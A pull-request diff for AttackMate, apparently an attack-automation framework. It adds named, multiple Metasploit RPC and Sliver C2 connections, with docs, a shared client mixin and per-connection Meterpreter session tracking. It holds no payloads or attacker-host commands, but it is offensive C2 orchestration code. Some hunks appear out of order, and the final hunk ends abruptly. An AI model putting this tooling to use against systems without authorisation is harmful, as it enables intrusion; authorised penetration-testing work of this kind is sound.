### PR TITLE
Add named multi-connection support for MSF and Sliver

### DIFF
--- a/docs/source/configuration/index.rst
+++ b/docs/source/configuration/index.rst
@@ -35,11 +35,13 @@ sliver, metasploit and remote attackmate server:
        password: password
 
    msf_config:
-     password: securepassword
-     server: 127.0.0.1
+     default:
+       password: securepassword
+       server: 127.0.0.1
 
    sliver_config:
-     config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
+     default:
+       config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
 
    remote_config:
      remote_server_name:

--- a/docs/source/configuration/msf_config.rst
+++ b/docs/source/configuration/msf_config.rst
@@ -4,13 +4,40 @@
 msf_config
 ==========
 
-``msf_config`` holds connection settings for the Metasploit RPC daemon (``msfrpcd``).
+``msf_config`` holds connection settings for one or more Metasploit RPC daemon (``msfrpcd``)
+instances. Each connection is identified by a name. The first defined connection is used by
+default when a command does not specify one explicitly.
 
 .. code-block:: yaml
 
    msf_config:
-     password: securepassword
-     server: 10.18.3.86
+     primary:
+       password: securepassword
+       server: 10.18.3.86
+
+Multiple servers can be defined and selected per command via the :confval:`connection` field:
+
+.. code-block:: yaml
+
+   msf_config:
+     server1:
+       password: securepassword
+       server: 10.18.3.86
+     server2:
+       password: anothersecret
+       server: 10.18.3.87
+
+.. note::
+
+   **Backwards compatibility:** The legacy single-server format is still accepted and is
+   automatically migrated to a named entry called ``default``:
+
+   .. code-block:: yaml
+
+      # Legacy format (still supported)
+      msf_config:
+        password: securepassword
+        server: 10.18.3.86
 
 
 .. confval:: server

--- a/docs/source/configuration/sliver_config.rst
+++ b/docs/source/configuration/sliver_config.rst
@@ -4,12 +4,37 @@
 sliver_config
 =============
 
-``sliver_config`` stores all settings to control the connection to the Sliver API.
+``sliver_config`` stores connection settings for one or more Sliver C2 servers.
+Each connection is identified by a name. The first defined connection is used by
+default when a command does not specify one explicitly.
 
 .. code-block:: yaml
 
    sliver_config:
-     config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
+     primary:
+       config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
+
+Multiple servers can be defined and selected per command via the :confval:`connection` field:
+
+.. code-block:: yaml
+
+   sliver_config:
+     sliver_server1:
+       config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
+     sliver_server2:
+       config_file: /home/attacker/.sliver-client/configs/attacker2_localhost.cfg
+
+.. note::
+
+   **Backwards compatibility:** The legacy single-server format is still accepted and is
+   automatically migrated to a named entry called ``default``:
+
+   .. code-block:: yaml
+
+      # Legacy format (still supported)
+      sliver_config:
+        config_file: /home/attacker/.sliver-client/configs/attacker_localhost.cfg
+
 
 .. confval:: config_file
 

--- a/docs/source/developing/command.rst
+++ b/docs/source/developing/command.rst
@@ -110,7 +110,7 @@ The factory filters the provided configurations based on the class constructor s
             'pm': self.pm,
             'varstore': self.varstore,
             'cmdconfig': self.pyconfig.cmd_config,
-            'msfconfig': self.pyconfig.msf_config,
+            'msf_config': self.pyconfig.msf_config,
             'msfsessionstore': self.msfsessionstore,
             'sliver_config': self.pyconfig.sliver_config,
             'runfunc': self._run_commands,

--- a/docs/source/developing/integration.rst
+++ b/docs/source/developing/integration.rst
@@ -247,11 +247,11 @@ Top-level configuration object. All fields have safe defaults, so an empty
      - ``CommandConfig``
      - Global command execution settings. See below.
    * - ``msf_config``
-     - ``MsfConfig``
-     - Metasploit RPC connection settings. See below.
+     - ``dict[str, MsfConfig]``
+     - Named Metasploit RPC connections. See below.
    * - ``sliver_config``
-     - ``SliverConfig``
-     - Sliver C2 connection settings. See below.
+     - ``dict[str, SliverConfig]``
+     - Named Sliver C2 connections. See below.
    * - ``bettercap_config``
      - ``dict[str, BettercapConfig]``
      - Named Bettercap instances. Keys are referenced by ``webserv`` commands.
@@ -440,7 +440,7 @@ Running a Single Command
         initialize_logger(debug=False, append_logs=False)
 
         config = Config(
-            msf_config={"password": "your_password", "ssl": True, "port": 55553},
+            msf_config={"default": {"password": "your_password", "ssl": True, "port": 55553}},
             cmd_config={"loop_sleep": 10},
         )
         varstore = {"HOST": "10.0.0.1"}

--- a/docs/source/playbook/commands/msf-module.rst
+++ b/docs/source/playbook/commands/msf-module.rst
@@ -96,7 +96,7 @@ Most exploit modules do not produce direct output but instead open a session
 
    :type: str
 
-   The following example illustrates the use of sessions and payloads:
+The following example illustrates the use of sessions and payloads:
 
 .. code-block:: yaml
 

--- a/docs/source/playbook/commands/msf-module.rst
+++ b/docs/source/playbook/commands/msf-module.rst
@@ -89,6 +89,13 @@ Most exploit modules do not produce direct output but instead open a session
 
    :type: str
 
+.. confval:: connection
+
+   Name of the MSF server connection to use, as defined in :ref:`msf_config`.
+   If omitted, the first configured connection is used.
+
+   :type: str
+
    The following example illustrates the use of sessions and payloads:
 
 .. code-block:: yaml

--- a/docs/source/playbook/commands/msf-session.rst
+++ b/docs/source/playbook/commands/msf-session.rst
@@ -78,3 +78,10 @@ Execute commands in an active Meterpreter session previously opened by an
    String indicating the end of a read-operation.
 
    :type: str
+
+.. confval:: connection
+
+   Name of the MSF server connection to use, as defined in :ref:`msf_config`.
+   If omitted, the first configured connection is used.
+
+   :type: str

--- a/docs/source/playbook/commands/payload.rst
+++ b/docs/source/playbook/commands/payload.rst
@@ -100,3 +100,10 @@ Generate a Metasploit payload and save it to a file.
 
    :type: int
    :default: ``0``
+
+.. confval:: connection
+
+   Name of the MSF server connection to use, as defined in :ref:`msf_config`.
+   If omitted, the first configured connection is used.
+
+   :type: str

--- a/docs/source/playbook/commands/sliver-session.rst
+++ b/docs/source/playbook/commands/sliver-session.rst
@@ -9,6 +9,8 @@ Execute commands within an active Sliver implant session. All commands require a
 
 .. note::
 
+   To configure the connection to the Sliver server, see :ref:`sliver_config`.
+
    **For developers:** The ``sliver`` and ``sliver-session`` command families use a legacy
    ``type`` + ``cmd`` discrimination pattern and should not be replicated. New commands
    must define a unique ``type`` literal and handle sub-behavior branching via ``cmd``
@@ -21,6 +23,13 @@ Execute commands within an active Sliver implant session. All commands require a
 
    :type: str
    :required: True
+
+.. confval:: connection
+
+   Name of the Sliver server connection to use, as defined in :ref:`sliver_config`.
+   If omitted, the first configured connection is used.
+
+   :type: str
 
 File System
 -----------

--- a/docs/source/playbook/commands/sliver.rst
+++ b/docs/source/playbook/commands/sliver.rst
@@ -8,10 +8,19 @@ Control the Sliver C2 server via its API. All commands use ``type: sliver``.
 
 .. note::
 
+   To configure the connection to the Sliver server, see :ref:`sliver_config`.
+
    **For developers:** The ``sliver`` and ``sliver-session`` command families use a legacy
    ``type`` + ``cmd`` discrimination pattern and should not be replicated. New commands
    must define a unique ``type`` literal and handle sub-behavior branching via ``cmd``
    in the executor. See :ref:`command` for details.
+
+.. confval:: connection
+
+   Name of the Sliver server connection to use, as defined in :ref:`sliver_config`.
+   If omitted, the first configured connection is used.
+
+   :type: str
 
 start_https_listener
 --------------------

--- a/src/attackmate/attackmate.py
+++ b/src/attackmate/attackmate.py
@@ -19,7 +19,7 @@ from typing import Dict, Optional
 import logging
 from attackmate.result import Result
 import attackmate.executors as executors
-from attackmate.schemas.config import CommandConfig, Config, MsfConfig, SliverConfig
+from attackmate.schemas.config import CommandConfig, Config
 from attackmate.schemas.playbook import Playbook
 from attackmate.schemas.command_types import Commands, Command
 from attackmate.variablestore import VariableStore
@@ -87,8 +87,8 @@ class AttackMate:
     def _default_config(self) -> Config:
         return Config(
             cmd_config=CommandConfig(),
-            msf_config=MsfConfig(),
-            sliver_config=SliverConfig(),
+            msf_config={},
+            sliver_config={},
             bettercap_config={},
             remote_config={}
         )
@@ -109,7 +109,7 @@ class AttackMate:
             'pm': self.pm,
             'varstore': self.varstore,
             'cmdconfig': self.pyconfig.cmd_config,
-            'msfconfig': self.pyconfig.msf_config,
+            'msf_config': self.pyconfig.msf_config,
             'bettercap_config': self.pyconfig.bettercap_config,
             'remote_config': self.pyconfig.remote_config,
             'msfsessionstore': self.msfsessionstore,

--- a/src/attackmate/executors/__init__.py
+++ b/src/attackmate/executors/__init__.py
@@ -23,7 +23,7 @@ from .remote.remoteexecutor import RemoteExecutor
 from .browser.browserexecutor import BrowserExecutor
 
 __all__ = [
-    'RemoteExecutor'
+    'RemoteExecutor',
     'BrowserExecutor',
     'ShellExecutor',
     'SSHExecutor',

--- a/src/attackmate/executors/metasploit/msfclientmixin.py
+++ b/src/attackmate/executors/metasploit/msfclientmixin.py
@@ -26,7 +26,9 @@ class MsfClientMixin:
             if conn_name not in self.msf_config:
                 raise ExecException(f"MSF connection '{conn_name}' not found in config")
             config = self.msf_config[conn_name]
-            self.logger.debug(f'Connecting to MSF server: {conn_name}')
+            self.logger.debug(
+                f"Connecting to MSF server '{conn_name}' at {config.server}:{config.port} (ssl={config.ssl})"
+            )
             try:
                 self._msf_clients[conn_name] = MsfRpcClient(**config.model_dump())
             except IOError as e:

--- a/src/attackmate/executors/metasploit/msfclientmixin.py
+++ b/src/attackmate/executors/metasploit/msfclientmixin.py
@@ -1,0 +1,38 @@
+import logging
+from typing import Dict
+from pymetasploit3.msfrpc import MsfRpcClient, MsfAuthError
+from attackmate.schemas.base import BaseCommand
+from attackmate.schemas.config import MsfConfig
+from attackmate.execexception import ExecException
+
+
+class MsfClientMixin:
+    msf_config: Dict[str, MsfConfig]
+    _msf_clients: Dict[str, MsfRpcClient]
+    logger: logging.Logger
+
+    def _resolve_connection(self, command: BaseCommand) -> str:
+        conn = getattr(command, 'connection', None)
+        if conn:
+            return conn
+        if self.msf_config:
+            conn_name = next(iter(self.msf_config))
+            self.logger.debug(f'No connection specified, using default: {conn_name}')
+            return conn_name
+        raise ExecException('No MSF connections configured')
+
+    def _get_client(self, conn_name: str) -> MsfRpcClient:
+        if conn_name not in self._msf_clients:
+            if conn_name not in self.msf_config:
+                raise ExecException(f"MSF connection '{conn_name}' not found in config")
+            config = self.msf_config[conn_name]
+            self.logger.debug(f'Connecting to MSF server: {conn_name}')
+            try:
+                self._msf_clients[conn_name] = MsfRpcClient(**config.model_dump())
+            except IOError as e:
+                self.logger.error(e)
+                raise ExecException(f'MSF connection failed: {e}')
+            except MsfAuthError as e:
+                self.logger.error(e)
+                raise ExecException(f'MSF authentication failed: {e}')
+        return self._msf_clients[conn_name]

--- a/src/attackmate/executors/metasploit/msfexecutor.py
+++ b/src/attackmate/executors/metasploit/msfexecutor.py
@@ -1,6 +1,4 @@
-from pymetasploit3.msfrpc import MsfRpcClient, MsfAuthError
-
-from typing import Optional
+from typing import Optional, Dict
 from attackmate.variablestore import VariableStore
 from attackmate.executors.baseexecutor import BaseExecutor
 from attackmate.execexception import ExecException
@@ -8,28 +6,31 @@ from attackmate.result import Result
 from attackmate.executors.features.cmdvars import CmdVars
 from attackmate.schemas.base import BaseCommand
 from attackmate.schemas.metasploit import MsfModuleCommand
+from attackmate.schemas.config import MsfConfig
 from attackmate.executors.metasploit.msfsessionstore import MsfSessionStore
+from attackmate.executors.metasploit.msfclientmixin import MsfClientMixin
 from attackmate.processmanager import ProcessManager
 from multiprocessing.managers import BaseManager
 from multiprocessing import Manager
 from multiprocessing.queues import JoinableQueue
 from attackmate.executors.executor_factory import executor_factory
+from pymetasploit3.msfrpc import MsfRpcClient
 
 
 @executor_factory.register_executor('msf-module')
-class MsfModuleExecutor(BaseExecutor):
+class MsfModuleExecutor(MsfClientMixin, BaseExecutor):
     def __init__(
         self,
         pm: ProcessManager,
         cmdconfig=None,
         *,
         varstore: VariableStore,
-        msfconfig=None,
+        msf_config: Dict[str, MsfConfig] = {},
         msfsessionstore: MsfSessionStore,
     ):
-        self.msfconfig = msfconfig
+        self.msf_config = msf_config
+        self._msf_clients: Dict[str, MsfRpcClient] = {}
         self.sessionstore = msfsessionstore
-        self.msf = None
         self.manager: Optional[BaseManager] = None
         super().__init__(pm, varstore, cmdconfig)
 
@@ -41,33 +42,17 @@ class MsfModuleExecutor(BaseExecutor):
             self.sessionstore.queue = self.manager.JoinableQueue()  # type: ignore
         return self.sessionstore.queue
 
-    def connect(self, msfconfig=None):
-        try:
-            self.msf = MsfRpcClient(**msfconfig.dict())
-        except IOError as e:
-            self.logger.error(e)
-            self.msf = None
-        except MsfAuthError as e:
-            self.logger.error(e)
-            self.msf = None
-
     def log_command(self, command: BaseCommand):
-        if self.msf is None:
-            self.logger.debug('Connecting to msf-server...')
-            self.connect(self.msfconfig)
         self.logger.info(f"Executing Msf-Module: '{command.cmd}'")
 
-    def prepare_payload(self, command: MsfModuleCommand):
+    def prepare_payload(self, command: MsfModuleCommand, msf: MsfRpcClient):
         self.logger.debug(f'Using payload: {command.payload}')
         if command.payload is None:
             return None
-        if self.msf is not None:
-            try:
-                payload = self.msf.modules.use('payload', command.payload)
-            except TypeError:
-                raise ExecException(f'Payload {command.payload} seems to be incorrect')
-        else:
-            raise ExecException('Problems with the metasploit connection')
+        try:
+            payload = msf.modules.use('payload', command.payload)
+        except TypeError:
+            raise ExecException(f'Payload {command.payload} seems to be incorrect')
         for option, setting in command.payload_options.items():
             try:
                 payload[option] = setting
@@ -76,16 +61,13 @@ class MsfModuleExecutor(BaseExecutor):
         self.logger.debug(payload.options)
         return payload
 
-    def prepare_exploit(self, command: MsfModuleCommand):
+    def prepare_exploit(self, command: MsfModuleCommand, msf: MsfRpcClient):
         exploit = None
         option: str = ''
         try:
             self.logger.debug(f'module_type: {command.module_type()}')
             self.logger.debug(f'module_path: {command.module_path()}')
-            if self.msf is not None:
-                exploit = self.msf.modules.use(command.module_type(), command.module_path())
-            else:
-                raise ExecException('Problems with the metasploit connection')
+            exploit = msf.modules.use(command.module_type(), command.module_path())
             self.logger.debug(exploit.description)
             for option, setting in command.options.items():
                 if setting.isnumeric():
@@ -96,7 +78,7 @@ class MsfModuleExecutor(BaseExecutor):
                 else:
                     exploit[option] = setting
             if command.session:
-                session_id = self.sessionstore.get_session_by_name(command.session, self.msf.sessions)
+                session_id = self.sessionstore.get_session_by_name(command.session, msf.sessions)
                 self.logger.debug(f'Using session-id: {session_id}')
                 exploit['SESSION'] = int(session_id)
         except KeyError:
@@ -105,16 +87,15 @@ class MsfModuleExecutor(BaseExecutor):
             raise ExecException(f'Module or Module Type is Unknown: {e}')
         if exploit.missing_required:
             raise ExecException(f'Missing required exploit options: {exploit.missing_required}')
-
         exploit.target = CmdVars.variable_to_int('target', command.target)
         return exploit
 
     async def _exec_cmd(self, command: MsfModuleCommand) -> Result:
-        if self.msf is None:
-            raise ExecException('ConnectionError')
+        conn_name = self._resolve_connection(command)
+        msf = self._get_client(conn_name)
 
-        exploit = self.prepare_exploit(command)
-        payload = self.prepare_payload(command)
+        exploit = self.prepare_exploit(command, msf)
+        payload = self.prepare_payload(command, msf)
 
         if command.creates_session is not None:
             self.logger.debug('Command creates a msf-session')
@@ -124,28 +105,28 @@ class MsfModuleExecutor(BaseExecutor):
             if command.module_path() == 'multi/manage/shell_to_meterpreter':
                 self.logger.debug('Waiting for increased session..')
                 self.sessionstore.wait_for_increased_session(
-                    command.creates_session, result['uuid'], self.msf.sessions, self.child_queue
+                    command.creates_session, result['uuid'], msf.sessions, self.child_queue
                 )
             else:
                 self.sessionstore.wait_for_session(
-                    command.creates_session, result['uuid'], self.msf.sessions, self.child_queue
+                    command.creates_session, result['uuid'], msf.sessions, self.child_queue
                 )
             return Result('', 0)
-        cid = self.msf.consoles.console().cid
-        output = self.msf.consoles.console(cid).run_module_with_output(exploit, payload=payload)
+        cid = msf.consoles.console().cid
+        output = msf.consoles.console(cid).run_module_with_output(exploit, payload=payload)
         return Result(output, 0)
 
     def cleanup(self):
-        if self.msf is not None:
-            self.logger.debug('Killing all Meterpreter sessions')
-            active_sessions = self.msf.sessions.list
+        for conn_name, msf in self._msf_clients.items():
+            self.logger.debug(f'Killing all Meterpreter sessions for connection: {conn_name}')
+            active_sessions = msf.sessions.list
             if active_sessions:
                 for session_id, session_data in active_sessions.items():
                     try:
                         self.logger.debug(f'Stopping msf session {session_id}')
-                        self.msf.sessions.session(session_id).stop()
+                        msf.sessions.session(session_id).stop()
                         self.logger.info(f'Msf session {session_id} stopped successfully.')
                     except Exception as e:
                         self.logger.error(f'Failed to stop msf session {session_id}: {str(e)}')
             else:
-                self.logger.debug('No active msf sessions found.')
+                self.logger.debug(f'No active msf sessions found for connection: {conn_name}')

--- a/src/attackmate/executors/metasploit/msfexecutor.py
+++ b/src/attackmate/executors/metasploit/msfexecutor.py
@@ -61,7 +61,7 @@ class MsfModuleExecutor(MsfClientMixin, BaseExecutor):
         self.logger.debug(payload.options)
         return payload
 
-    def prepare_exploit(self, command: MsfModuleCommand, msf: MsfRpcClient):
+    def prepare_exploit(self, command: MsfModuleCommand, msf: MsfRpcClient, conn_name: str):
         exploit = None
         option: str = ''
         try:
@@ -78,7 +78,7 @@ class MsfModuleExecutor(MsfClientMixin, BaseExecutor):
                 else:
                     exploit[option] = setting
             if command.session:
-                session_id = self.sessionstore.get_session_by_name(command.session, msf.sessions)
+                session_id = self.sessionstore.get_session_by_name(conn_name, command.session, msf.sessions)
                 self.logger.debug(f'Using session-id: {session_id}')
                 exploit['SESSION'] = int(session_id)
         except KeyError:
@@ -94,7 +94,7 @@ class MsfModuleExecutor(MsfClientMixin, BaseExecutor):
         conn_name = self._resolve_connection(command)
         msf = self._get_client(conn_name)
 
-        exploit = self.prepare_exploit(command, msf)
+        exploit = self.prepare_exploit(command, msf, conn_name)
         payload = self.prepare_payload(command, msf)
 
         if command.creates_session is not None:
@@ -105,11 +105,11 @@ class MsfModuleExecutor(MsfClientMixin, BaseExecutor):
             if command.module_path() == 'multi/manage/shell_to_meterpreter':
                 self.logger.debug('Waiting for increased session..')
                 self.sessionstore.wait_for_increased_session(
-                    command.creates_session, result['uuid'], msf.sessions, self.child_queue
+                    conn_name, command.creates_session, result['uuid'], msf.sessions, self.child_queue
                 )
             else:
                 self.sessionstore.wait_for_session(
-                    command.creates_session, result['uuid'], msf.sessions, self.child_queue
+                    conn_name, command.creates_session, result['uuid'], msf.sessions, self.child_queue
                 )
             return Result('', 0)
         cid = msf.consoles.console().cid

--- a/src/attackmate/executors/metasploit/msfpayloadexecutor.py
+++ b/src/attackmate/executors/metasploit/msfpayloadexecutor.py
@@ -6,8 +6,8 @@ payloads in AttackMate.
 """
 
 import tempfile
-from typing import Any
-from pymetasploit3.msfrpc import MsfRpcClient, MsfAuthError
+from typing import Any, Dict
+from pymetasploit3.msfrpc import MsfRpcClient
 from attackmate.executors.baseexecutor import BaseExecutor
 from attackmate.result import Result
 from attackmate.execexception import ExecException
@@ -15,40 +15,27 @@ from attackmate.processmanager import ProcessManager
 from attackmate.variablestore import VariableStore
 from attackmate.executors.features.cmdvars import CmdVars
 from attackmate.schemas.metasploit import MsfPayloadCommand
-from attackmate.schemas.config import CommandConfig
+from attackmate.schemas.config import CommandConfig, MsfConfig
+from attackmate.executors.metasploit.msfclientmixin import MsfClientMixin
 from attackmate.executors.executor_factory import executor_factory
 
 
 @executor_factory.register_executor('msf-payload')
-class MsfPayloadExecutor(BaseExecutor):
+class MsfPayloadExecutor(MsfClientMixin, BaseExecutor):
     def __init__(
-        self, pm: ProcessManager, varstore: VariableStore, cmdconfig=CommandConfig(), *, msfconfig=None
+        self, pm: ProcessManager, varstore: VariableStore, cmdconfig=CommandConfig(), *,
+        msf_config: Dict[str, MsfConfig] = {}
     ):
-        self.msfconfig = msfconfig
-        self.msf = None
+        self.msf_config = msf_config
+        self._msf_clients: Dict[str, MsfRpcClient] = {}
         self.tempfilestore: list[Any] = []
         super().__init__(pm, varstore, cmdconfig)
 
-    def connect(self, msfconfig=None):
-        try:
-            self.msf = MsfRpcClient(**msfconfig.dict())
-        except IOError as e:
-            self.logger.error(e)
-            self.msf = None
-        except MsfAuthError as e:
-            self.logger.error(e)
-            self.msf = None
-
     def log_command(self, command: MsfPayloadCommand):
-        if self.msf is None:
-            self.logger.debug('Connecting to msf-server...')
-            self.connect(self.msfconfig)
         self.logger.info(f"Generating Msf-Payload: '{command.cmd}'")
 
-    def prepare_payload(self, command: MsfPayloadCommand):
-        if not self.msf:
-            raise ExecException('Please connect to msfrpcd first')
-        payload = self.msf.modules.use('payload', command.cmd)
+    def prepare_payload(self, command: MsfPayloadCommand, msf: MsfRpcClient):
+        payload = msf.modules.use('payload', command.cmd)
         payload.runoptions['BadChars'] = command.badchars
         payload.runoptions['Encoder'] = command.encoder
         payload.runoptions['Format'] = command.format
@@ -79,7 +66,10 @@ class MsfPayloadExecutor(BaseExecutor):
         return payload_path
 
     async def _exec_cmd(self, command: MsfPayloadCommand) -> Result:
-        payload = self.prepare_payload(command)
+        conn_name = self._resolve_connection(command)
+        msf = self._get_client(conn_name)
+
+        payload = self.prepare_payload(command, msf)
         try:
             data = payload.payload_generate()
         except Exception:

--- a/src/attackmate/executors/metasploit/msfsessionexecutor.py
+++ b/src/attackmate/executors/metasploit/msfsessionexecutor.py
@@ -1,101 +1,90 @@
 import atexit
 
-from pymetasploit3.msfrpc import MsfRpcClient, MsfAuthError
+from typing import Dict
 from attackmate.variablestore import VariableStore
 from attackmate.executors.metasploit.msfsessionstore import MsfSessionStore
 from attackmate.executors.baseexecutor import BaseExecutor
-from attackmate.execexception import ExecException
 from attackmate.result import Result
 from attackmate.schemas.base import BaseCommand
 from attackmate.schemas.metasploit import MsfSessionCommand
+from attackmate.schemas.config import MsfConfig
+from attackmate.executors.metasploit.msfclientmixin import MsfClientMixin
+from attackmate.execexception import ExecException
 from attackmate.processmanager import ProcessManager
 from attackmate.executors.executor_factory import executor_factory
+from pymetasploit3.msfrpc import MsfRpcClient
 
 
 @executor_factory.register_executor('msf-session')
-class MsfSessionExecutor(BaseExecutor):
+class MsfSessionExecutor(MsfClientMixin, BaseExecutor):
     def __init__(
         self,
         pm: ProcessManager,
         cmdconfig=None,
         *,
         varstore: VariableStore,
-        msfconfig=None,
+        msf_config: Dict[str, MsfConfig] = {},
         msfsessionstore: MsfSessionStore,
     ):
-        self.msfconfig = msfconfig
+        self.msf_config = msf_config
+        self._msf_clients: Dict[str, MsfRpcClient] = {}
         self.sessionstore = msfsessionstore
-        self.msf = None
         atexit.register(self.cleanup)
         super().__init__(pm, varstore, cmdconfig)
 
-    def connect(self, msfconfig=None):
-        try:
-            self.msf = MsfRpcClient(**msfconfig.dict())
-        except IOError as e:
-            self.logger.error(e)
-            self.msf = None
-        except MsfAuthError as e:
-            self.logger.error(e)
-            self.msf = None
-
     def log_command(self, command: BaseCommand):
-        if self.msf is None:
-            self.logger.debug('Connecting to msf-server...')
-            self.connect(self.msfconfig)
         self.logger.info(f"Executing Msf-Session-Command: '{command.cmd}'")
 
     async def _exec_cmd(self, command: MsfSessionCommand) -> Result:
-        if self.msf is None:
-            raise ExecException('ConnectionError')
+        conn_name = self._resolve_connection(command)
+        msf = self._get_client(conn_name)
 
-        session_id = self.sessionstore.get_session_by_name(command.session, self.msf.sessions)
+        session_id = self.sessionstore.get_session_by_name(command.session, msf.sessions)
         self.logger.debug(f'Using session-id: {session_id}')
         return_empty = False
 
         try:
-
             if command.stdapi:
                 self.logger.info('Loading stapi')
-                self.msf.sessions.session(session_id).write('load stdapi')
+                msf.sessions.session(session_id).write('load stdapi')
             if command.write:
                 self.logger.info('Writing raw-data in msf-session')
-                self.msf.sessions.session(session_id).write(command.cmd)
+                msf.sessions.session(session_id).write(command.cmd)
                 output = ''
                 return_empty = True
             if command.read:
                 self.logger.info('Reading raw-data in msf-session')
-                output = self.msf.sessions.session(session_id).read()
+                output = msf.sessions.session(session_id).read()
                 return Result(output, 0)
 
             if not return_empty:
                 self.logger.info('Executing a msf-command')
                 try:
-                    output = self.msf.sessions.session(session_id).run_with_output(
+                    output = msf.sessions.session(session_id).run_with_output(
                         command.cmd, command.end_str
                     )
                 except TypeError:
                     self.logger.debug('Fallback: First raw-write again and then raw-read data in msf-session')
-                    self.msf.sessions.session(session_id).write(command.cmd)
-                    output = self.msf.sessions.session(session_id).read()
+                    msf.sessions.session(session_id).write(command.cmd)
+                    output = msf.sessions.session(session_id).read()
 
         except KeyError as e:
-            self.logger.debug(self.msf.sessions.list)
+            self.logger.debug(msf.sessions.list)
             self.logger.debug(session_id)
             raise ExecException(e)
         return Result(output, 0)
 
     def cleanup(self):
-        if self.msf is not None:
-            self.logger.debug('Killing all Meterpreter sessions')
-            active_sessions = self.msf.sessions.list
+        for conn_name, msf in self._msf_clients.items():
+            self.logger.debug(f'Killing all Meterpreter sessions for connection: {conn_name}')
+            active_sessions = msf.sessions.list
             if active_sessions:
                 for session_id, session_data in active_sessions.items():
                     try:
                         self.logger.debug(f'Stopping msf session {session_id}')
-                        self.msf.sessions.session(session_id).stop()
+                        msf.sessions.session(session_id).stop()
                         self.logger.info(f'Msf session {session_id} stopped successfully.')
                     except Exception as e:
                         self.logger.error(f'Failed to stop msf session {session_id}: {str(e)}')
             else:
-                self.logger.debug('No active msf sessions found.')
+                self.logger.debug(f'No active msf sessions found for connection: {conn_name}')

--- a/src/attackmate/executors/metasploit/msfsessionexecutor.py
+++ b/src/attackmate/executors/metasploit/msfsessionexecutor.py
@@ -39,7 +39,7 @@ class MsfSessionExecutor(MsfClientMixin, BaseExecutor):
         conn_name = self._resolve_connection(command)
         msf = self._get_client(conn_name)
 
-        session_id = self.sessionstore.get_session_by_name(command.session, msf.sessions)
+        session_id = self.sessionstore.get_session_by_name(conn_name, command.session, msf.sessions)
         self.logger.debug(f'Using session-id: {session_id}')
         return_empty = False
 

--- a/src/attackmate/executors/metasploit/msfsessionstore.py
+++ b/src/attackmate/executors/metasploit/msfsessionstore.py
@@ -8,64 +8,75 @@ from attackmate.execexception import ExecException
 
 class MsfSessionStore:
     def __init__(self, varstore: VariableStore) -> None:
-        self.sessions: Dict[str, str] = {}
+        self.sessions: Dict[str, Dict[str, str]] = {}
         self.logger = logging.getLogger('playbook')
         self.varstore = varstore
         self.queue: Optional[JoinableQueue] = None
         self.get_session_wait_time = 5
 
-    def add_session(self, name: str, uuid: str) -> None:
-        self.logger.debug(f'Set MSF-Session: {name} = {uuid}')
-        self.sessions[name] = uuid
+    def _conn_sessions(self, conn_name: str) -> Dict[str, str]:
+        if conn_name not in self.sessions:
+            self.sessions[conn_name] = {}
+        return self.sessions[conn_name]
 
-    def get_session_by_name(self, name: str, msfsessions, block: bool = True) -> str:
+    def add_session(self, conn_name: str, name: str, uuid: str) -> None:
+        self.logger.debug(f'Set MSF-Session [{conn_name}]: {name} = {uuid}')
+        self._conn_sessions(conn_name)[name] = uuid
+
+    def get_session_by_name(self, conn_name: str, name: str, msfsessions, block: bool = True) -> str:
+        conn_sessions = self._conn_sessions(conn_name)
         while True:
             if self.queue:
                 while not self.queue.empty():
                     item = self.queue.get()
-                    self.logger.debug(f'Session from Queue: {item[0]} = {item[1]}')
-                    self.add_session(item[0], item[1])
-                    self.logger.debug(f'Set LAST_MSF_SESSION to {item[2]}')
-                    self.varstore.set_variable('LAST_MSF_SESSION', item[2])
+                    # item: (conn_name, session_name, uuid, session_id)
+                    self.logger.debug(f'Session from Queue: [{item[0]}] {item[1]} = {item[2]}')
+                    self.add_session(item[0], item[1], item[2])
+                    self.logger.debug(f'Set LAST_MSF_SESSION to {item[3]}')
+                    self.varstore.set_variable('LAST_MSF_SESSION', item[3])
+                    self.varstore.set_variable(f'LAST_MSF_SESSION_{item[0]}', item[3])
                     self.queue.task_done()
                     time.sleep(self.get_session_wait_time)
             for k, v in msfsessions.list.items():
-                if name in self.sessions:
-                    if v['exploit_uuid'] == self.sessions[name]:
+                if name in conn_sessions:
+                    if v['exploit_uuid'] == conn_sessions[name]:
                         return k
                     else:
                         self.logger.debug(
-                            f'uuid {self.sessions[name]} does not match with any entry in sessions')
+                            f'uuid {conn_sessions[name]} does not match with any entry in sessions')
                 else:
-                    self.logger.debug(f'{name} not found in msfsessions')
+                    self.logger.debug(f'{name} not found in msfsessions for connection {conn_name}')
 
             if not block:
                 raise ExecException(f'Session ({name}) not found')
             else:
                 time.sleep(3)
 
-    def add_or_queue_session(self, name: str, uuid: str, queue: Optional[JoinableQueue] = None,
+    def add_or_queue_session(self, conn_name: str, name: str, uuid: str,
+                             queue: Optional[JoinableQueue] = None,
                              session_id: Optional[int] = None):
         seconds = 30
         if queue:
-            queue.put((name, uuid, session_id))
+            queue.put((conn_name, name, uuid, session_id))
         else:
-            self.add_session(name, uuid)
+            self.add_session(conn_name, name, uuid)
             self.logger.debug(f'Set LAST_MSF_SESSION: {session_id}')
             self.varstore.set_variable('LAST_MSF_SESSION', str(session_id))
+            self.varstore.set_variable(f'LAST_MSF_SESSION_{conn_name}', str(session_id))
             self.logger.debug(f'Waiting {seconds} seconds for session to get ready')
             time.sleep(seconds)
 
-    def wait_for_session(self, name: str, uuid: str, msfsessions, queue: Optional[JoinableQueue] = None):
+    def wait_for_session(self, conn_name: str, name: str, uuid: str, msfsessions,
+                         queue: Optional[JoinableQueue] = None):
         self.logger.debug(f'Sessions: {msfsessions.list}')
         while True:
             if len(list(msfsessions.list.keys())) > 0:
                 for session_id, v in msfsessions.list.items():
                     if v['exploit_uuid'] == uuid:
-                        self.add_or_queue_session(name, uuid, queue, session_id)
+                        self.add_or_queue_session(conn_name, name, uuid, queue, session_id)
                         return
 
-    def wait_for_increased_session(self, name: str, uuid: str, msfsessions,
+    def wait_for_increased_session(self, conn_name: str, name: str, uuid: str, msfsessions,
                                    queue: Optional[JoinableQueue] = None):
         stored_list_len = len(list(msfsessions.list.keys()))
         sessions = list(msfsessions.list.keys())
@@ -73,6 +84,6 @@ class MsfSessionStore:
             if len(list(msfsessions.list.keys())) > stored_list_len:
                 for session_id, v in msfsessions.list.items():
                     if session_id not in sessions:
-                        self.add_or_queue_session(name, v['exploit_uuid'], queue, session_id)
